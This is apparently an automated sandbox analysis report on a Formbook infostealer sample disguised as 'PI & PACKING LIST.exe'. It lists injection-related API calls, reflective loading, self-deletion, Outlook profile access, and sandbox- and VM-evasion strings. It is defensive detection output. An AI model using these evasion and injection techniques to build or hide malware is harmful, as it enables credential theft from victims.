      Source: Process Memory Space: control.exe PID: 5228, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_00B2ADBC
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_00B2D478
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_00B2D46A
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_04A39F68
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_083E0037
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_083E0033
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_083E0040
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_083E9248
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01254120
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123F900
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012599BF
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0130E824
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A830
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1002
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012620A0
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_013020A8
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124B090
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_013028EC
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01302B28
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012DCB4F
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125AB40
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126EBB0
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126138B
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012E23E3
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F03DA
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012FDBD2
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126ABD8
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012EFA2B
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B236
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_013022AE
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4AEF
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01230D20
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01302D07
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01301D55
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01262581
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F2D82
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124D5E0
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_013025DD
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124841F
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012FD466
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01301FF1
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0130DFCE
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01256E30
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012FD616
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01302EF7
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004012AA
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004211BD
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004223D6
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_00422B89
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0040B457
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004044C7
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004044BE
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004046E7
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0040FE87
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: String function: 0123B150 appears 136 times
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012799A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012798F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279540 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012795D0 NtClose,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012797A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012796E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279950 NtQueueApcThread,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012799D0 NtCreateProcessEx,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279820 NtEnumerateKey,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0127B040 NtSuspendThread,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012798A0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279B00 NtSetValueKey,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0127A3B0 NtGetContextThread,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279A10 NtQuerySection,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279A80 NtOpenDirectoryObject,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279520 NtWaitForSingleObject,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0127AD30 NtSetContextThread,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279560 NtWriteFile,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012795F0 NtQueryInformationFile,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279730 NtQueryVirtualMemory,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0127A710 NtOpenProcessToken,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279760 NtOpenProcess,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0127A770 NtOpenThread,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279770 NtSetInformationFile,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279610 NtEnumerateValueKey,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279670 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279650 NtQueryValueKey,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012796D0 NtCreateKey,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041E007 NtClose,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041E0B7 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004012AA NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041DED7 NtCreateFile,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041DF87 NtReadFile,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041E001 NtClose,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041E0B3 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004014E9 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041DE93 NtCreateFile,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041DF81 NtReadFile,
      Source: PI & PACKING LIST.exe, 00000000.00000002.279173554.0000000006E90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCollins.dll8 vs PI & PACKING LIST.exe
      Source: PI & PACKING LIST.exe, 00000000.00000000.240444204.00000000001CE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesZHy.exe: vs PI & PACKING LIST.exe
      Source: PI & PACKING LIST.exe, 00000002.00000002.355397019.000000000132F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PI & PACKING LIST.exe
      Source: PI & PACKING LIST.exe, 00000002.00000003.259681724.0000000000FF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PI & PACKING LIST.exe
      Source: PI & PACKING LIST.exe, 00000002.00000003.261884863.0000000001191000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PI & PACKING LIST.exe
      Source: PI & PACKING LIST.exeBinary or memory string: OriginalFilenamesZHy.exe: vs PI & PACKING LIST.exe
      Source: PI & PACKING LIST.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: PI & PACKING LIST.exeReversingLabs: Detection: 76%
      Source: PI & PACKING LIST.exeVirustotal: Detection: 57%
      Source: PI & PACKING LIST.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
      Source: C:\Windows\SysWOW64\control.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PI & PACKING LIST.exe.log
      Source: C:\Windows\SysWOW64\control.exeFile created: C:\Users\user\AppData\Local\Temp\71M40-2OQ
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/2@6/5
      Source: PI & PACKING LIST.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
      Source: PI & PACKING LIST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: PI & PACKING LIST.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: wntdll.pdbUGP source: PI & PACKING LIST.exe, 00000002.00000002.354114112.0000000001210000.00000040.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.260987211.0000000001072000.00000004.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.259137326.0000000000EDE000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.514714921.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.353323429.0000000004B74000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.515759584.0000000004FCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.355819858.0000000004D15000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: PI & PACKING LIST.exe, PI & PACKING LIST.exe, 00000002.00000002.354114112.0000000001210000.00000040.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.260987211.0000000001072000.00000004.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.259137326.0000000000EDE000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.514714921.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.353323429.0000000004B74000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.515759584.0000000004FCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.355819858.0000000004D15000.00000004.00000800.00020000.00000000.sdmp

      Data Obfuscation

      Source: PI & PACKING LIST.exe, Othello/MainForm.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 0.0.PI & PACKING LIST.exe.d0000.0.unpack, Othello/MainForm.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_083E4539 push esi; ret
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_083E71E0 push eax; ret
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_083E3206 push ebx; iretd
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0128D0D1 push ecx; ret
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0040A0C9 push 7C55F36Ch; retf
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004210CC push eax; ret
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041A0DE pushfd ; iretd
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0041B08A push CBA396CFh; ret
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_00421119 push eax; ret
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_00421122 push eax; ret
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_00421183 push eax; ret
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0040A1B8 push 0845B845h; iretd
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_004054C4 push edx; ret
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_00419E80 push ebx; retf
      Source: initial sampleStatic PE information: section name: .text entropy: 7.603845618377083

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\SysWOW64\control.exeFile deleted: c:\users\user\desktop\pi & packing list.exe
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: Yara matchFile source: 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: PI & PACKING LIST.exe PID: 6140, type: MEMORYSTR
      Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
      Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe TID: 5128Thread sleep time: -42186s >= -30000s
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe TID: 6124Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01305BA5 rdtsc
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeAPI coverage: 6.1 %
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeThread delayed: delay time: 42186
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeThread delayed: delay time: 922337203685477
      Source: control.exe, 0000000D.00000002.510454015.00000000010D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
      Source: explorer.exe, 00000003.00000000.288461486.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
      Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
      Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
      Source: explorer.exe, 00000003.00000000.281178206.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
      Source: explorer.exe, 00000003.00000000.288461486.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000003.00000000.288461486.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
      Source: explorer.exe, 00000003.00000000.287642705.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
      Source: explorer.exe, 00000003.00000000.267722463.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
      Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
      Source: explorer.exe, 00000003.00000000.287642705.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01305BA5 rdtsc
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01254120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01254120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01254120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01254120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01254120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01239100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01239100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01239100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0123C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0123B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0123B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125B944 mov eax, dword ptr fs:[00000030h]
